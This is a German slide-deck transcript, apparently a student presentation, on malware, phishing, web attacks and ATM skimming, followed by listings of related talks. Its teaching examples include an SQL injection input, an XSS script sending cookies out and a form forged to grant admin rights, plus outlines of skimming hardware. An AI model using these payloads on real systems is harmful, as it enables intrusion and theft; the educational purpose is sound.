Aktuelle Beispiele für Sicherheitsprobleme. Omio Horo, Büsra Coskuner

Größe: px
Ab Seite anzeigen:

Download "Aktuelle Beispiele für Sicherheitsprobleme. Omio Horo, Büsra Coskuner"

Transkript

1 Aktuelle Beispiele für Sicherheitsprobleme Omio Horo, Büsra Coskuner

2 Agenda Ein Blick in den Posteingang Allgemeine Attacken - Beispiele Spezielle Attacken - Beispiele Schutzmaßnahmen 2

3 Agenda Ein Blick in den Posteingang Allgemeine Attacken - Beispiele Spezielle Attacken - Beispiele Schutzmaßnahmen 3

4 Ein Blick in den Posteingang Malware Viren Würmer Trojanische Pferde Hoaxes Phishing 4

5 Ein Blick in den Posteingang Malware Malware malicious software: schädliche bzw. böswillige Programme Computerprogramme, die vom Benutzer unerwünschte und ggf. schädliche Funktionen ausführen. Schließt ein Viren, Würmer, Trojanische Pferde, Adware, Spyware usw. 5

6 Ein Blick in den Posteingang Viren C I A!!! Viren Nisten sich in Computer ein und breiten sich innerhalb dieser aus Übertragung auf andere Wirte erfolgt passiv durch den Benutzer Modifizieren die infizierten Dateien Bei Ausführung des ursprünglichen Programms wird tatsächlich der Virus aktiviert. 6

7 Ein Blick in den Posteingang Würmer C I A!!! Würmer Breiten sich nicht innerhalb der infizierten Computer aus Übertragen sich aktiv über ein Netzwerk meistens das Internet auf andere Computer Bereits vorhandene Dateien werden nicht infiziert Sinn: so viele Rechner wie möglich befallen 7

8 Ein Blick in den Posteingang Würmer Einige bekannte Würmer: MyDoom: Bekannt seit: Januar 2004 Schaden: Backdoor Netsky: Bekannt seit: März 2004 Schaden: Massenmailing Sasser: Bekannt seit: Mai 2004 Schaden: Systemabstürze, verminderte Systemleistung 8

9 Ein Blick in den Posteingang Trojanische Pferde C I A!!! Trojanische Pferde Programm, das mehr als das von ihm Erwartete oder von ihm Erwartetes falsch oder nicht tut (Pfitzmann) oder Computerprogramm, das als nützliche Anwendung getarnt ist, im Hintergrund aber ohne Wissen des Anwenders eine andere Funktion erfüllt. Verbreiten sich nicht selbstständig Werden manchmal gezielt, manchmal zufällig eingeschleust Dienen u.a. dazu, Passwörter auszuspähen oder den gesamten Rechner zu zerstören. 9

10 Ein Blick in den Posteingang Trojanische Pferde Beispiele für Schadensfunktionen von trojanischen Pferden Backdoor: Teil eines Computerprogramms, der es Benutzern ermöglicht, unter Umgehung der normalen Zugriffssicherung Zugang zum Computer oder einem Computerprogramm zu erlangen und den Computer/ das Programm zu steuern. Keylogger: Hard- oder Software, die dazu verwendet wird, die Eingaben des Benutzers an einem Computer mitzuprotokollieren und dadurch zu überwachen oder zu rekonstruieren, um an vertrauliche Daten etwa Kennworte oder PIN zu gelangen. 10

11 Ein Blick in den Posteingang Trojanische Pferde Beispiele für Schadensfunktionen von trojanischen Pferden Dropper: installiert unbemerkt Malware auf ein System Sniffer: Überwachung des Datenverkehrs oder aller Benutzeraktivitäten Dialer: heimliche Einwahl auf Telefon- Mehrwertrufnummern Trojaner müssen nicht unbedingt Schadensfunktionen erfüllen! 11

12 Ein Blick in den Posteingang Hoaxes C I A!! Hoaxes Seriös wirkende Warnungen vor Malware (Schädliche Programme) via Aufforderung der Empfänger, weiterzuleiten Haben keinen ernst zu nehmenden Hintergrund Weiter leiten führt nur zur Belastung des Internets aufgrund nutzlosen Datenverkehrs 12

13 Ein Blick in den Posteingang Phishing C I A!!! Phishing "Abfischen" vertraulicher Daten i.d.r. über s, die scheinbar von seriösen Firmen stammen Aufforderung des Empfängers unbedingt eine bestimmte Web-Adresse anzusteuern und dort dann seine vertraulichen Daten einzugeben Betrüger benutzen Internetadressen, die sich nur geringfügig von denen der renommierten Firmen unterscheiden. Oder sie fälschen die Adressleiste des Browsers mit einem Java-Skript. 13

14 Agenda Ein Blick in den Posteingang Allgemeine Attacken - Beispiele Spezielle Attacken - Beispiele Schutzmaßnahmen 14

15 Allgemeine Attacken Malware-Attacken Security im Internet Motivation der Angreifer Faktor Mensch 15

16 Malware-Attacken 16

17 17

18 18

19 19

20 20

21 Allgemeine Attacken Malware-Attacken Würmer Diese hübsche Dame ist ein Skype-Virus , 21

22 Allgemeine Attacken Malware-Attacken Würmer Diese hübsche Dame ist ein Skype-Virus , Ein Chat-Fenster öffnet sich mit dem obigen Bild im Miniformat. Ein Klick auf das Bild: Bild öffnet sich, der Rechner wird mit dem Wurm Mal/Pykse-A infiziert. Kontakte erhalten ebenfalls dieses Minibild mit dem Wurm. Wurm versucht sich mit einigen Webseiten zu verbinden, wahrscheinlich um die Anzahl ihrer Klicks zu erhöhen. 22

23 Allgemeine Attacken Malware-Attacken Trojanische Pferde Medienfeind: Trojaner killt MP3s und Videos , 23

24 Allgemeine Attacken Malware-Attacken Trojanische Pferde Medienfeind: Trojaner killt MP3s und Videos , Name des Trojaners: MediaDel-A Löscht MP3-, WAV-, AVI- und MPG-Dateien vom befallenen System Gelöschte Daten werden ersetzt durch eine Textnachricht: you should not steal our hard work. thanks for understanding why we did this. RIAA/MPAA. Wahrscheinlich soll der Ruf der US Musikindustrie geschädigt werden. 24

25 Allgemeine Attacken Malware-Attacken Trojanische Pferde Falsche Ebay-Mails: ein geschenkter Gaul , 25

26 Allgemeine Attacken Malware-Attacken Trojanische Pferde Falsche Ebay-Mails: ein geschenkter Gaul , Vorgeblich von Ebay kommende Mails versprechen den Empfängern ein Geschenk. Betreff: "Das spezielle Geschenk zum Kauf." Aufforderung, einem bestimmten Link zu folgen. vorgetäuschte Fehlermeldung ("Server Error"), im Hintergrund ein Script, der den zum ermittelten Browser passenden Exploit-Code anwendet, um einen Downloader einzuschleusen. Lädt Backdoor und Keylogger herunter. 26

27 Allgemeine Attacken Malware-Attacken Phishing: 27

28 Allgemeine Attacken Malware-Attacken Phishing: Webseite 28

29 Allgemeine Attacken Malware-Attacken Trend Microsoft: Sprunghafter Anstieg der Angriffe auf persönliche Daten , 29

30 Allgemeine Attacken Malware-Attacken Trend Microsoft: Sprunghafter Anstieg der Angriffe auf persönliche Daten , In der ersten Jahreshälfte 2007: 500% mehr Schädlinge als in den sechs Monaten zuvor hätten versucht, an persönliche Informationen von Anwendern zu kommen. Angriffsversuche durch Trojaner, Keylogger und Spionageprogramme Zwei der von Microsoft entdeckten Trojanerfamilien hätten es gezielt auf Bankinformationen abgesehen. 30

31 Allgemeine Attacken Malware-Attacken Trend Trojanische Pferde weiter auf dem Vormarsch , 31

32 Allgemeine Attacken Malware-Attacken Trend Trojanische Pferde weiter auf dem Vormarsch , Zahl der neu entdeckten Trojanischen Pferde steigt an, die der Würmer und Viren sinkt Anteil neu entdeckter Schädlinge im 2. Quartal 2007: Trojanische Pferde 83%, Würmer 8%, Adware 5%, Spyware 2% 32

33 Internet-Attacken 33

34 34

35 Allgemeine Attacken Security im Internet SQL-Injection Was man wohl da oben alles eingeben kann? 35

36 Allgemeine Attacken Security im Internet C I A!!! SQL-Injection Angreifer kann SQL-Statements ausführen Schwachstelle: Formfelder/ Webformular Beispiel: User gibt ein: OR 1 -- Applicationcode zum Auswerten der .find(:all, :conditions => ownwer_id=123 AND subject= # { } generiertes SQL: select * from s where owner_id=123 AND subject = OR

37 Allgemeine Attacken Security im Internet SQL-Injection OR 1 ist immer TRUE Alles nach - - ist ein Kommentar Folge: Es können ziemlich viele SQL Statements abgesetzt werden. 37

38 Allgemeine Attacken Security im Internet C I A!!! CSS/ XSS (Cross Site Scripting) Idee: Cookie klauen Cookie speichert u.a. den Status des Users (Ein-/ Ausgeloggt) Cookie-Protokoll unterstützt rudimentäre Sicherheit (Nur Website, die Cookie erstellt, darf diesen auch lesen) Mit Java-Script kann man ihn trotzdem lesen. 38

39 Allgemeine Attacken Security im Internet CSS/ XSS (Cross Site Scripting) Beispiel: Angreifer besucht Shopping-Website. In das Hilfe- Formularfeld für Administratoren gibt er Java-Scriptcode ein: <script> document.location= +document.co okie </script> Admin sieht sich irgendwann die Hilfemeldung im Browser an. Im Browser ist zu lesen: <div class= user_comment > <%=user_comment%> </div> Gleichzeitig wird das Java-Script ausgeführt. Folge: Angreifer ist als Systemadministrator eingeloggt. 39

40 Allgemeine Attacken Security im Internet Aktuell Zehntausende Kunden von Kreditkartendiebstahl betroffen , 40

41 Allgemeine Attacken Security im Internet Aktuell Zehntausende Kunden von Kreditkartendiebstahl betroffen , Sehr wahrscheinlich XSS-Attacke Administratoren sollen auch Zugriff auf Abrechnungssystem gehabt haben, welches Kreditkarteninformationen enthält. 41

42 Allgemeine Attacken Security im Internet C I A!! ID-Parameters Man kauft online ein und begutachtet den Warenkorb In der Browserzeile steht... Was passiert wohl, wenn man etwas anderes eintippt? Folge: Durch URL-Manipulationen verschafft man sich unerlaubte Einblicke. 42

43 Allgemeine Attacken Security im Internet Aktuell Erneute Datenpanne bei ebay , 43

44 Allgemeine Attacken Security im Internet Aktuell Erneute Datenpanne bei ebay , Newsletter wurde verschickt, mit personlisiertem Link Link lässt sich manipulieren, so dass man ebay- Usernamen und Real-Namen von wildfremden Personen erhält. 44

45 Allgemeine Attacken Security im Internet C I A!!! Direkter Datenbankeintrag Was der User sieht 45

46 Allgemeine Attacken Security im Internet Direkter Datenbankeintrag Wie das HTML im Browser aussieht 46

47 Allgemeine Attacken Security im Internet Direkter Datenbankeintrag <form method="post action="http://website.domain/user/register"> <input type="text" name="user[name]" /> <input type="text" name="user[password]" /> </form> 47

48 Allgemeine Attacken Security im Internet Direkter Datenbankeintrag Was unsere Applikation an Feldern hat: create_table:users column: name,:string column: password,:string column: role,:string,:default=> user column: approved,:integer,:default=>0 48

49 Allgemeine Attacken Security im Internet Direkter Datenbankeintrag <form method="post" action="http://website.domain/user/register"> <input type="text" name="user[name]" /> <input type="text" name="user[password]" /> <input type="text" name="user[role]" value="admin" /> <input type="text" name="user[approved]" value="1" /> </form> 49

50 Allgemeine Attacken Security im Internet Direkter Datenbankeintrag User hat sich als Administrator angemeldet und freigeschaltet. 50

51 Allgemeine Attacken Security im Internet C I A!!! File Uploads Sehr beliebt: Bilder Applikation prüft nur (kann auch nur prüfen), ob die Dateiendung valide ist (jpg, bmp, png, gif, ) Folge: Bildinformationen wie z.b. Beschreibungen, Erstellungsdatum, Kommentare etc. können potentiell böswilligen Code enthalten. Diese können bei Anzeigen des Bildes ausgeführt werden. 51

52 Allgemeine Attacken Security im Internet C I A! Logfiles Speichert ALLES! Ist meistens sogar den Administratoren nicht bewusst, was alles gespeichert wird. Z.B. Kreditkarteninformationen 52

53 Motivation der Angreifer 53

54 Allgemeine Attacken Motivation der Angreifer Früher: Das System bezwingen und dessen Grenzen testen Programme an die Grenzen ihrer Leistungsfähigkeit bringen Neugier, Freude an der Herausforderung $ Ruhm, Anerkennung, Prestige $$ Einige bekannte ehemalige Hacker: Steve Wozniak (Gründer Apple Computer Company) Bill Gates (Gründer Microsoft Corporation) Linus Torvalds (Entwickler Linux) $$$ $ 54

55 Allgemeine Attacken Motivation der Angreifer Heute überwiegend: Kriminelle Motive Machtgelüste, Rache, Böswilligkeit Monetäre Ziele: abfangen von Banking-Daten Geld verdienen durch spezielle Aufträge Natürlich auch Neugier, Langeweile, sich Beweisen $ $$ $$$ $ 55

56 Allgemeine Attacken Motivation der Angreifer Geldquelle: Malware Cybercrime: Der Markt boomt , 56

57 Allgemeine Attacken Motivation der Angreifer Geldquelle: Malware Cybercrime: Der Markt boomt , Zu kaufen: u.a. Malware, Spam und DDos-Attacken Oft: Kombination aus Spam-Kampagne und DDoS-Attacke u.a. Versand von 20 Mio. Spam- s: 350 DDoS-Attacke: 20 pro Stunde Trojaner: $ für Exploits zu noch unbekannten Sicherheitslücken, mehrere zehntausend Euro für speziell angefertigte Trojaner 57

58 58

59 Allgemeine Attacken Motivation der Angreifer Quelltextausschnitte: MyDoom.U/V: We searching 4 work in AV industry. I-love-you Virus: I hate go to school 59

60 Allgemeine Attacken Motivation der Angreifer Quelltextausschnitte Kleinkrieg Netsky vs. MyDoom & Bagle? NetSky.C: "we are the skynet - you can't hide yourself! - we kill malware writers (they have no chance!) - [LaMeRz- ->] MyDoom.F is a thief of our idea! - -< SkyNet AV vs. Malware". Bagle.I: "Hey, NetSky, fuck off you bitch, don't ruine our business, wanna start a war?" MyDoom.F (über Netsky): "your shitty app" 60

61 Faktor Mensch 61

62 Allgemeine Attacken Faktor Mensch Beitrag des Benutzers am Umlauf von Malware Offensichtliche Viren im Anhang, die nicht geöffnet werden sollten Verweise auf Links in dubiosen s Malware, deren Installation bestätigt werden muss Passwörter sind frei zugänglich z.b. auf Klebezetteln vermerkt Passwörter zu einfach Neugier, Unkenntnis, Unbedachtheit 62

63 Agenda Ein Blick in den Posteingang Allgemeine Attacken - Beispiele Spezielle Attacken Beispiele Schutzmaßnahmen 63

64 Spezielle Attacken W-LAN, Navigationsgeräte Handy EC-Karte, Online-Banking 64

65 W-LAN, Navigationsgeräte 65

66 Spezielle Attacken W-LAN, Navigationsgeräte C I A!!! W-LAN Unendlich viele Verschlüsselungsmöglichkeiten (WEP, DES, ) Bei Auslieferung per Default off Kein PC-Neuling weiß, wie er Verschlüsselung einschaltet. Folge: Verschlüsselungsmöglichkeiten werden nicht genutzt. Lösung: seit etwa einem Jahr ist bei Auslieferung eines neuen Rechners die W-LAN-Verschlüsselung eingeschaltet. 66

67 Spezielle Attacken W-LAN, Navigationsgeräte C I A!! Navigationsgeräte Hat Kartenmaterial, aber kann auch Codes empfangen (TMC) Location Code, Event Code Codes werden über Radiosignale übermittelt. Angreifer stellt sich auf eine bestimmte Position und wartet auf vorbei fahrendes Auto. Gefälschte Eventcodes wie z.b. Staumeldungen werden im Navigationsgerät des vorbei fahrenden Autos angezeigt. 67

68 Handy 68

69 Spezielle Attacken Handy C I A!!! Handy-Würmer: Erste Handy-Würmer seit Mitte 2004 im Umlauf Verbreitung über Bluetooth Bekannter Wurm zu Testzwecken: Cabir Cabir erfordert allerdings die explizite Erlaubnis und mehrmalige Bestätigung zur Installation Betroffene Geräte u.a. Nokia 76xx, 6xxx, 36xx, N-Gage; Panasonic X700, Siemens SX-1, Sendo X Richtet keinen Schaden an, verringert Akku-Laufzeit, weil er ständig aktive Bluetooth-Geräte sucht. 69

70 Spezielle Attacken Handy Falschmeldungen und Hoaxes: Kettenbrief warnt vor Handy-Virus, das sich an Telefonbucheinträge verbreitet, die mit ICE beginnen Angeblicher Dialer in der geknackte Raubkopie des Spiels "Mosquitos Warnung vor der Anzeigen ACE-? und UNAVAILABLE auf dem Display 70

71 Spezielle Attacken Handy Abhören von Handys Hacker machen Handys zu Wanzen , 71

72 Spezielle Attacken Handy Abhören von Handys Hacker machen Handys zu Wanzen , Service-SMS wird vom Handy akzeptiert und führt einen Programmcode aus Problem sei Lücke in den Protokollen der Service-SMS Service-SMS dienen dazu, Software-Updates auf die Telefonkarte oder das Handy zu übertragen, ohne dass der Kunde etwas merkt. Handy empfängt Service-SMS mit bestimmten Code. Folge: Gespräche werden mitgehört, SMS gelesen, Adressbücher kopiert usw. Nach eigenen Angaben im Dezember 2006 arbeite das FBI bereits mit dieser Methode 72

73 EC-Karte, Online-Banking 73

74 Spezielle Attacken EC-Karte, Online-Banking C I A!!! Kopieren der EC-Karte: eine Möglichkeit Befestigung eines Lesegeräts an Eingabeschlitz kopiert Magnetstreifen Befestigung einer kleinen Kamera an die Lichtleiste oder an den Prospekthalter zeichnet die PIN-Eingabe auf oder Befestigung einer zweiten Tastatur auf originale Tastatur speichert die eingegebene PIN-Nummer Daten des Magnetstreifens auf andere Magnetstreifenkarte aufbringen Mit gefälschter EC-Karte und dem PIN im Ausland Geld abheben 74

75 Spezielle Attacken EC-Karte, Online-Banking Vorher Nachher 75

76 Spezielle Attacken EC-Karte, Online-Banking Vorher Nachher 76

77 Spezielle Attacken EC-Karte, Online-Banking Tastatur aus der Nähe 77

78 Spezielle Attacken EC-Karte, Online-Banking Vorher Nachher 78

79 Spezielle Attacken EC-Karte, Online-Banking Vorher Nachher 79

80 Spezielle Attacken EC-Karte, Online-Banking Vorher Nachher 80

81 Spezielle Attacken EC-Karte, Online-Banking Vorher Nachher 81

82 Spezielle Attacken EC-Karte, Online-Banking Weitere Karteneinschübe 82

83 Spezielle Attacken EC-Karte, Online-Banking Präparierte Lichtleiste 83

84 Spezielle Attacken EC-Karte, Online-Banking Dubletten 84

85 Spezielle Attacken EC-Karte, Online-Banking Weitere interessante Bilder unter 85

86 Spezielle Attacken EC-Karte Einige Berichte EC-Karte und PIN - Ausspähen im Handel , Betrug mit EC-Karten , Sicherheitsrisiko EC - warum weder PIN noch Unterschrift schützen , Neuer Kartentrick , 86

87 Spezielle Attacken EC-Karte, Online-Banking C I A!! Online-Banking Zusätzlich zur PIN gibt es eine TAN, welche zeitlich befristet ist. Grundsätzlich treten jedoch beim Online-Banking eher Phishing und unfreiwillig installierte Keylogger-Attacken auf. 87

88 Agenda Ein Blick in den Posteingang Allgemeine Attacken - Beispiele Spezielle Attacken Beispiele Schutzmaßnahmen 88

89 Schutzmaßnahmen Eure Vorschläge! 89

90 90

91 Vielen Dank! 91

92 Quellen

Aktuelle Beispiele für Sicherheitsprobleme. Omio Horo, Büsra Coskuner

Aktuelle Beispiele für Sicherheitsprobleme. Omio Horo, Büsra Coskuner Aktuelle Beispiele für Sicherheitsprobleme Omio Horo, Büsra Coskuner Agenda Ein Blick in den Posteingang Allgemeine Attacken - Beispiele Spezielle Attacken - Beispiele Schutzmaßnahmen Omio Horo, Büsra

Mehr

Kombinierte Attacke auf Mobile Geräte

Kombinierte Attacke auf Mobile Geräte Kombinierte Attacke auf Mobile Geräte 1 Was haben wir vorbereitet Man in the Middle Attacken gegen SmartPhone - Wie kommen Angreifer auf das Endgerät - Visualisierung der Attacke Via Exploit wird Malware

Mehr

Viren, Würmer, Trojaner

Viren, Würmer, Trojaner Viren, Würmer, Trojaner Was muss ich beachten? Ralf Benzmüller G DATA Software AG Überblick Einleitung Grundlegende Begriffe Gefahrensituation Zahlen und Daten Trends Infektionsmechanismen Viren Würmer

Mehr

Sicher(lich) ebanking

Sicher(lich) ebanking Sicher(lich) ebanking Maja Krecov ebanking Service Beratung Zürcher Kantonalbank Geschäftshaus Hard D 8005 Zürich Postfach, 8010 Zürich Inhaltsverzeichnis o Wann ist man infiziert? o Was wollen die Hacker

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Digitale Identität. Candid Wüest Threat Researcher Symantec Switzerland

Digitale Identität. Candid Wüest Threat Researcher Symantec Switzerland Candid Wüest Threat Researcher Symantec Switzerland Agenda 1 Welche Informationen gibt es online 2 Wie kommen die Daten abhanden 3 Was wird mit den Daten angestellt 4 Q & A Candid Wüest 2 Was gehört dazu?

Mehr

Computersicherheit & Passwörter

Computersicherheit & Passwörter 1 1. Malware Spuren - Sobald der Rechner eine Online-Verbindung herstellt, empfängt und sendet er Daten und hinterlässt Spuren. Begriff - Malware ist der Oberbegriff für Software, die dem Anwender schaden

Mehr

Phishing und Pharming - Abwehrmaßnahmen gegen Datendiebstahl im Internet

Phishing und Pharming - Abwehrmaßnahmen gegen Datendiebstahl im Internet Phishing und Pharming - Abwehrmaßnahmen gegen Datendiebstahl im Internet Beispiel für eine gefälschte Ebay-Mail Unterschiede zu einer echten Ebay-Mail sind nicht zu erkennen. Quelle: www.fraudwatchinternational.com

Mehr

HANDYLUDER. Das Handyvirusquartett. Spielen. Sammeln. Trumpfen. Lernen. inkl. 30 Tipps für einen sicheren Umgang mit Handy, Smartphone, PDA & Co.

HANDYLUDER. Das Handyvirusquartett. Spielen. Sammeln. Trumpfen. Lernen. inkl. 30 Tipps für einen sicheren Umgang mit Handy, Smartphone, PDA & Co. HANDYLUDER Das Handyvirusquartett Spielen. Sammeln. Trumpfen. Lernen. inkl. 30 Tipps für einen sicheren Umgang mit Handy, Smartphone, PDA & Co. Berühmte Handy-Malware: Viren, Würmer, Trojaner & Co. Handyluder

Mehr

Malware - Viren, Würmer und Trojaner

Malware - Viren, Würmer und Trojaner Department of Computer Sciences University of Salzburg June 21, 2013 Malware-Gesamtentwicklung 1984-2012 Malware-Zuwachs 1984-2012 Malware Anteil 2/2011 Malware Viren Würmer Trojaner Malware Computerprogramme,

Mehr

IZ SICHERHEIT. Sicherheitsforum Online-Banking. Matthias Stoffel. Dietzenbach, 28. April 2015 INFORMATIK ZENTRALE SERVICES.

IZ SICHERHEIT. Sicherheitsforum Online-Banking. Matthias Stoffel. Dietzenbach, 28. April 2015 INFORMATIK ZENTRALE SERVICES. SICHERHEIT INFORMATIK ZENTRALE SERVICES Sicherheitsforum Online-Banking Matthias Stoffel Dietzenbach, 28. April 2015 Finanzgruppe S GmbH 2015 SICHERHEIT INFORMATIK ZENTRALE SERVICES 1. Sicherheitsmerkmale

Mehr

Wo ist mein Geld? Identitätsmissbrauch im Online-Banking. Christoph Sorge Universität des Saarlandes juris-stiftungsprofessur für Rechtsinformatik

Wo ist mein Geld? Identitätsmissbrauch im Online-Banking. Christoph Sorge Universität des Saarlandes juris-stiftungsprofessur für Rechtsinformatik Wo ist mein Geld? Identitätsmissbrauch im Online-Banking Christoph Sorge Universität des Saarlandes juris-stiftungsprofessur für Rechtsinformatik C. Sorge 2 Überblick Rechner des Kunden Server der Bank

Mehr

Gerd Armbruster Gerd.Armbruster@GMX.De

Gerd Armbruster Gerd.Armbruster@GMX.De Viren, Trojaner & Hacker - so schützen Sie Ihren PC Gerd Armbruster Gerd.Armbruster@GMX.De 100 Mio Sony Kunden gehackt Aktuell Alles 2011 Immer noch 2011 Geschäftsmodell Agenda! Sicherheit im Internet!

Mehr

Money for Nothing... and Bits4free

Money for Nothing... and Bits4free Money for Nothing... and Bits4free 8.8.2011 Gilbert Wondracek, gilbert@iseclab.org Hacker & Co Begriff hat je nach Kontext andere Bedeutung, Ursprung: 50er Jahre, MIT Ausnutzen von Funktionalität die vom

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Dr. Marc Rennhard Institut für angewandte Informationstechnologie Zürcher Hochschule Winterthur marc.rennhard@zhwin.ch Angriffspunkt

Mehr

Lange Nacht der Wissenschaften 2007. Gefahr aus dem Internet Wie kann ich mein Windows System schützen?

Lange Nacht der Wissenschaften 2007. Gefahr aus dem Internet Wie kann ich mein Windows System schützen? Lange Nacht der Wissenschaften 2007 Gefahr aus dem Internet Wie kann ich mein Windows System schützen? Manuel Selling Humboldt Universität zu Berlin ZE Computer und Medienservice Abt. Systemsoftware und

Mehr

Sicherheit bei PCs, Tablets und Smartphones

Sicherheit bei PCs, Tablets und Smartphones Michaela Wirth, IT-Sicherheit http://www.urz.uni-heidelberg.de/it-sicherheitsregeln Stand März 2015 Computer sind aus unserem Alltag nicht mehr wegzudenken. PCs, Notebooks, Tablets und Smartphones begleiten

Mehr

Sicherheit in Webanwendungen CrossSite, Session und SQL

Sicherheit in Webanwendungen CrossSite, Session und SQL Sicherheit in Webanwendungen CrossSite, Session und SQL Angriffstechniken und Abwehrmaßnahmen Mario Klump Die Cross-Site -Familie Die Cross-Site-Arten Cross-Site-Scripting (CSS/XSS) Cross-Site-Request-Forgery

Mehr

Personal Firewall (PFW) und Virenscanner. Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte

Personal Firewall (PFW) und Virenscanner. Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte Personal Firewall (PFW) und Virenscanner Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte Gliederung Personal Firewall Virenscanner 1. Zweck einer Firewall 2. Funktionsweise einer

Mehr

Einführung in Web-Security

Einführung in Web-Security Einführung in Web-Security Alexander»alech«Klink Gulaschprogrammiernacht 2013 Agenda Cross-Site-Scripting (XSS) Authentifizierung und Sessions Cross-Site-Request-Forgery ([XC]SRF) SQL-Injections Autorisierungsprobleme

Mehr

Für Eltern: Das ABC der Internetsicherheit

Für Eltern: Das ABC der Internetsicherheit ARTIKEL Für Eltern: Das ABC der Internetsicherheit Für Eltern ist Grundwissen in vielen Disziplinen Pflicht. Sie müssen Ihren Kindern die wichtigsten Verkehrsregeln ebenso beibringen wie korrekte Tischmanieren,

Mehr

Ihr persönliches Online-Banking Ersteinstieg

Ihr persönliches Online-Banking Ersteinstieg Yuri Arcurs - Fotolia.com Ihr persönliches Online-Banking Ersteinstieg Inhalt Auslandskartensperre 3 2 Inhalt 3 Auslandskartensperre 4 5 Einrichtung 6 Sicherheit 7 VR-Kennung 8 Sicherheitsrisiken Weitere

Mehr

Sicherheitshinweise zum Online-Banking

Sicherheitshinweise zum Online-Banking Sicherheitshinweise zum Online-Banking Damit Sie Ihre Bankgeschäfte nicht nur bequem, sondern auch sicher erledigen können, haben wir für Sie einige Sicherheitshinweise zusammengestellt. Bitte berücksichtigen

Mehr

Reverse Cloud. Michael Weisgerber. Channel Systems Engineer DACH September 2013

Reverse Cloud. Michael Weisgerber. Channel Systems Engineer DACH September 2013 Reverse Cloud Michael Weisgerber Channel Systems Engineer DACH September 2013 Öffentliche Wahrnehmung - heute Flame Duqu Stuxnet Page 2 2011 Palo Alto Networks. Proprietary and Confidential. Öffentliche

Mehr

Seminarvortrag. Anton Ebertzeder 02.12.2010. von

Seminarvortrag. Anton Ebertzeder 02.12.2010. von Seminarvortrag von Anton Ebertzeder am 02.12.2010 Überblick 1. Definitionen 2. Lebenszyklus 3. Verwendung von Botnets 4. Bekannte Botnets 5. Schutzmöglichkeiten 02.12.2010 Anton Ebertzeder 2 Definitionen

Mehr

Aktuelle Bedrohungen im Internet

Aktuelle Bedrohungen im Internet Aktuelle Bedrohungen im Internet Max Klaus, MELANI Bedrohungen von Webanwendungen Reto Inversini, BIT Botnetze webreaders.de/wp-content/uploads/2008/01/botnetz.jpg ISB / NDB Melde- und Analysestelle Informationssicherung

Mehr

Sicherheitsaspekte unter Windows 2000

Sicherheitsaspekte unter Windows 2000 Sicherheitsaspekte unter Windows 2000 Margarete Kudak Sascha Wiebesiek 1 Inhalt 1. Sicherheit 1.1 Definition von Sicherheit 1.2 C2 - Sicherheitsnorm 1.3 Active Directory 2. Sicherheitslücken 3. Verschlüsselung

Mehr

Aktuelle Phishingfälle- Sicherheitskontrolle fast immer dabei!

Aktuelle Phishingfälle- Sicherheitskontrolle fast immer dabei! Aktuelle Phishingfälle- Sicherheitskontrolle fast immer dabei! Eine Auswertung der seit Beginn des Jahres aufgetretenen Phishingfälle, sowie unterschiedliche mediale Beiträge zum Thema Phishing, zeigen

Mehr

Verein zur Förderung der privaten Internet Nutzung e.v. Sicher bewegen im Internet

Verein zur Förderung der privaten Internet Nutzung e.v. Sicher bewegen im Internet PING e.v. Verein zur Förderung der privaten Internet Nutzung e.v. Sicher bewegen im Internet HobbyTronic '05 Andreas Rossbacher PING e.v. Weiterbildung Übersicht Welche Gefahren drohen mir? Was ist das

Mehr

Truecrypt. 1. Was macht das Programm Truecrypt?

Truecrypt. 1. Was macht das Programm Truecrypt? Truecrypt Johannes Mand 09/2013 1. Was macht das Programm Truecrypt? Truecrypt ist ein Programm, das Speicherträgern, also Festplatten, Sticks oder Speicherkarten in Teilen oder ganz verschlüsselt. Daten

Mehr

Ethical Hacking für Fortgeschrittene

Ethical Hacking für Fortgeschrittene Manu Carus Manufaktur IT www.ethical-hacking.de Ethical Hacking für Fortgeschrittene Night School Inhalt Hacking Ethical Hacking Gesetzgebung Die Welt ist schlecht! Professionelle Einbrüche IT-Sicherheit

Mehr

Entwickelt von OpenLimit für das BMI sollte ursprünglich Open Source sein. ca. 70 bzw. 50 MB, langsam, Mischmasch

Entwickelt von OpenLimit für das BMI sollte ursprünglich Open Source sein. ca. 70 bzw. 50 MB, langsam, Mischmasch Ermöglicht Einsatz des Ausweises im Internet verbindet Benutzer, Leser, Chip und Server Entwickelt von OpenLimit für das BMI sollte ursprünglich Open Source sein zweite Version ist obfuscated ca. 70 bzw.

Mehr

PC-Treff BB. Sicherheitslücken und Passwortklau. Günter Waller 1

PC-Treff BB. Sicherheitslücken und Passwortklau. Günter Waller 1 PC-Treff BB Sicherheitslücken und Passwortklau Günter Waller 1 Übersicht Stichwortsammlung zum Thema Sicherheit Seit langem Bekanntes Neue Trends Was man wissen sollte Was jeder tun kann Spezielles, Überraschendes

Mehr

Verbreitete Angriffe

Verbreitete Angriffe Literatur Verbreitete Angriffe Univ.-Prof. Dr. Christoph Meinel Hasso-Plattner-Institut Universität Potsdam, Deutschland DoS und DDoS Angriffe (1/2) 2 Denial-of-Service Angriff mit dem Ziel der Störung

Mehr

Sicherheit. Bedeutung Gefahren. Mag. Friedrich Wannerer 1

Sicherheit. Bedeutung Gefahren. Mag. Friedrich Wannerer 1 Sicherheit Bedeutung Gefahren Mag. Friedrich Wannerer 1 Sicherheitsbegriff Unversehrtheit und Vertraulichkeit persönlicher Daten Datenschutzgesetz 2000 Bedrohungen q Dialer, Spam, Spyware, Viren, Würmer,

Mehr

PING e.v. Heimvernetzung und Sicherheit im Internet. HobbyTronic 2006. Nächster Vortrag: 12:15 Uhr. PING e.v. Weiterbildung - www.ping.

